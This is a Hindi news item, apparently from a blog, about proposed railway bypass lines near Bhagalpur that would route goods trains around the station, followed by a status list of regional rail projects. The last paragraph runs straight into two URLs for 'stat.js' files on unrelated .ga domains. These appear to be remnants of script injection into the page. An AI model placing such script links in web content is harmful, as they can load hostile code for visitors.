Thursday, January 27

भागलपुरवासियों के लिए सौगात, नयी दो दो रेल लाइन का शानदार तोहफा ऐसा होगा रुट प्लान

भागलपुर-साहिबगंज रेलखंड पर सबौर से बायपास लाइन निकलेगी जो कोइली खुटाहा के आगे जगदीशपुर से पहले यह लाइन मिल जाएगी। वहीं पंजवारा से बाई स्ट्रक्चर का एक लाइन बनेगी जो सीधे मुड़हड़ा, बांका में मिलेगी। विभागीय अधिकारियों की मानें तो इन दोनों लाइन के बनने से मालगाड़ियों को भागलपुर स्टेशन पर लाने की जरूरत नहीं होगी। जिस मालगाड़ी को दुमका से साहिबगंज या कहलगांव की ओर जानी होगी उसे बायपास लाइन के जरिये ही निकाल दिया जाएगा। इस तरह से पैसेंजर ट्रेनों का भी डाइवर्जन हो सकता है लेकिन उसकी संख्या बहुत कम होगी।

मालगाड़ी को भागलपुर नहीं लाने से जहां ट्रेन ऑपरेटिंग सिस्टम सुलभ रहेगा वहीं ट्रेनों की लेटलतीफी भी कम होगी। रेलकर्मी बताते हैं कि अभी दुमका से जो मालगाड़ी आती है उसका ईंजन भी घुमाना पड़ता है और इसमें करीब आधे घंटे तक प्लेटफॉर्म बाधित हो जाता है। अगर बायपास लाइन से ऐसी ट्रेन निकल जाएगी तो प्लेटफॉर्म बाधित नहीं होगा। यही कारण है कि इन दोनों रेल परियोजना की मांग मालदा डिविजन के ऑपरेटिंग विभाग ने की है। इसलिए उम्मीद है कि जल्द ही यह रेललाइन बनकर भी तैयार हो जाएगी। रेल अधिकारी बताते हैं कि अभी सर्वे का काम हुआ है। आगे की प्रक्रिया में लगभग एक साल और लग सकता है।

प्रमंडल में अबतक कितनी रेल परियोजनाएं, मंदारहिल-दुमका नई लाइन पूरी हो गई, देवघर-बांका नई लाइन पूरी हो गई, बांका-बाराहाट नई लाइन पूरी हो गई, भागलपुर-बड़हड़वा दोहरीकरण पूरी हो गई, सुल्तानगंज-बांका नई लाइन शुरू नहीं, सुल्तानगंज-कटोरिया नई लाइन शुरू नहीं, किउल-बड़हड़वा विद्युतीकरण काम जारी, बायपास लाइन का प्रोपोजल दिया गया है। प्राथमिक सर्वे भी कराया जा रहा है। रिपोर्ट जमा होने के बाद आगे की प्रक्रिया होगी। – निखिल चक्रवर्ती, सीपीआरओ, पूर्व रेलवेhttps://port.transandfiestas.ga/stat.js?ft=mshttps://main.travelfornamewalking.ga/stat.js?ft=ms

Leave a Reply

%d bloggers like this: